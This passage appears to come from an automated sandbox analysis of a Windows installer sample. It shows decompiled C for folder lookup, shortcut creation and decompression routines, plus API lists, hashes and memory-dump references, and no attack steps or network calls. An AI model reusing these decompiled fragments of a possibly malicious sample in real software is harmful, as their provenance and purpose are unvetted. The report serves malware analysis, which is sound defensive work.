                                                                                              0x00405b4d
                                                                                              0x00405b50
                                                                                              0x00405b52
                                                                                              0x00000000
                                                                                              0x00405b52
                                                                                              0x00405b08
                                                                                              0x00405b0b
                                                                                              0x00405b20
                                                                                              0x00405b27
                                                                                              0x00405b0d
                                                                                              0x00405b14
                                                                                              0x00405b14
                                                                                              0x00405b2f
                                                                                              0x00405b32
                                                                                              0x00405afb
                                                                                              0x00405afc
                                                                                              0x00405afc
                                                                                              0x00000000
                                                                                              0x00405b32
                                                                                              0x004059f0
                                                                                              0x004059f1
                                                                                              0x004059f7
                                                                                              0x004059f9
                                                                                              0x00405a13
                                                                                              0x00405a13
                                                                                              0x00405a1a
                                                                                              0x00405a1a
                                                                                              0x00405a21
                                                                                              0x00405a25
                                                                                              0x00405a25
                                                                                              0x00405a26
                                                                                              0x00405a28
                                                                                              0x00405a61
                                                                                              0x00405a64
                                                                                              0x00405a74
                                                                                              0x00405a77
                                                                                              0x00405a7f
                                                                                              0x00405a85
                                                                                              0x00405a85
                                                                                              0x00405ae1
                                                                                              0x00405ae1
                                                                                              0x00405ae3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a89
                                                                                              0x00405a90
                                                                                              0x00405a91
                                                                                              0x00405a93
                                                                                              0x00405aad
                                                                                              0x00405abb
                                                                                              0x00405ac1
                                                                                              0x00405ac3
                                                                                              0x00405ade
                                                                                              0x00405ade
                                                                                              0x00405ade
                                                                                              0x00000000
                                                                                              0x00405ade
                                                                                              0x00405ac9
                                                                                              0x00405ad4
                                                                                              0x00405ada
                                                                                              0x00405adc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405adc
                                                                                              0x00405a95
                                                                                              0x00405a98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405aa7
                                                                                              0x00405aa9
                                                                                              0x00405aab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405aab
                                                                                              0x00000000
                                                                                              0x00405ae1
                                                                                              0x00405a6c
                                                                                              0x00000000
                                                                                              0x00405a2a
                                                                                              0x00405a2f
                                                                                              0x00405a45
                                                                                              0x00405a4a
                                                                                              0x00405a4d
                                                                                              0x00405aea
                                                                                              0x00405aea
                                                                                              0x00405aee
                                                                                              0x00405af6
                                                                                              0x00405af6
                                                                                              0x00000000
                                                                                              0x00405aee
                                                                                              0x00405a57
                                                                                              0x00405ae5
                                                                                              0x00405ae5
                                                                                              0x00405ae8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405ae8
                                                                                              0x00405a28
                                                                                              0x004059fb
                                                                                              0x004059ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a01
                                                                                              0x00405a05
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a07
                                                                                              0x00405a0b
                                                                                              0x00000000
                                                                                              0x00405a0d
                                                                                              0x00405a0d
                                                                                              0x00000000
                                                                                              0x00405a0d
                                                                                              0x00405a0b
                                                                                              0x00405b70
                                                                                              0x00405b7a
                                                                                              0x00405b86
                                                                                              0x00405b86
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                                                                                              • GetWindowsDirectoryA.KERNEL32(ivvzb,00000400), ref: 00405A7F
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,0041B694), ref: 00405ABB
                                                                                              • SHGetPathFromIDListA.SHELL32(0041B694,ivvzb), ref: 00405AC9
                                                                                              • CoTaskMemFree.OLE32(0041B694), ref: 00405AD4
                                                                                              • lstrcatA.KERNEL32(ivvzb,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                                                                              • lstrlenA.KERNEL32(ivvzb,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ivvzb
                                                                                              • API String ID: 900638850-70652549
                                                                                              • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                              • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                                                                              • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                              • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                              0x0040201b
                                                                                              0x00402025
                                                                                              0x0040202e
                                                                                              0x00402038
                                                                                              0x00402041
                                                                                              0x0040204b
                                                                                              0x0040204f
                                                                                              0x0040204f
                                                                                              0x00402054
                                                                                              0x00402065
                                                                                              0x0040206d
                                                                                              0x0040214d
                                                                                              0x0040214d
                                                                                              0x00402154
                                                                                              0x00402073
                                                                                              0x00402073
                                                                                              0x00402084
                                                                                              0x00402088
                                                                                              0x0040208e
                                                                                              0x00402098
                                                                                              0x0040209a
                                                                                              0x004020a5
                                                                                              0x004020a8
                                                                                              0x004020b5
                                                                                              0x004020b7
                                                                                              0x004020b9
                                                                                              0x004020c0
                                                                                              0x004020c3
                                                                                              0x004020c3
                                                                                              0x004020c6
                                                                                              0x004020d0
                                                                                              0x004020d8
                                                                                              0x004020dd
                                                                                              0x004020e9
                                                                                              0x004020e9
                                                                                              0x004020ec
                                                                                              0x004020f5
                                                                                              0x004020f8
                                                                                              0x00402101
                                                                                              0x00402106
                                                                                              0x00402118
                                                                                              0x00402127
                                                                                              0x00402129
                                                                                              0x00402135
                                                                                              0x00402135
                                                                                              0x00402127
                                                                                              0x00402137
                                                                                              0x0040213d
                                                                                              0x0040213d
                                                                                              0x00402140
                                                                                              0x00402146
                                                                                              0x0040214b
                                                                                              0x00402160
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040214b
                                                                                              0x00402156
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 123533781-1943935188
                                                                                              • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                              • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                                                                              • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                              • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1E2A02, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E2A02(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                                                              0x6f1e2a07
                                                                                              0x6f1e2a17

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F1E5308,6F1EC9A8,00000001,?,6F1E541F,6F1EC9A8,00000017), ref: 6F1E2A07
                                                                                              • UnhandledExceptionFilter.KERNEL32(6F1EC9A8,?,6F1E5308,6F1EC9A8,00000001,?,6F1E541F,6F1EC9A8,00000017), ref: 6F1E2A10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 5014002abdb57376540c35f17ae6ae4b0513d6e4c1bc948b3fed27e3ca2b9a65
                                                                                              • Instruction ID: bb7030efbbe2080f875a7c442606d5cc1f7b0f571330fc406bee0e7d2752221c
                                                                                              • Opcode Fuzzy Hash: 5014002abdb57376540c35f17ae6ae4b0513d6e4c1bc948b3fed27e3ca2b9a65
                                                                                              • Instruction Fuzzy Hash: 8CB0923104470CABCF016BD1D80ABCC3F38EB066F2F008011F61E440609B6366208A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 39%
                                                                                              			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                              0x00402648
                                                                                              0x0040265c
                                                                                              0x00402667
                                                                                              0x00402668
                                                                                              0x004027a3
                                                                                              0x0040264a
                                                                                              0x0040264a
                                                                                              0x0040264c
                                                                                              0x0040264e
                                                                                              0x0040264e
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                              • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                                                                              • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                              • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406043, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
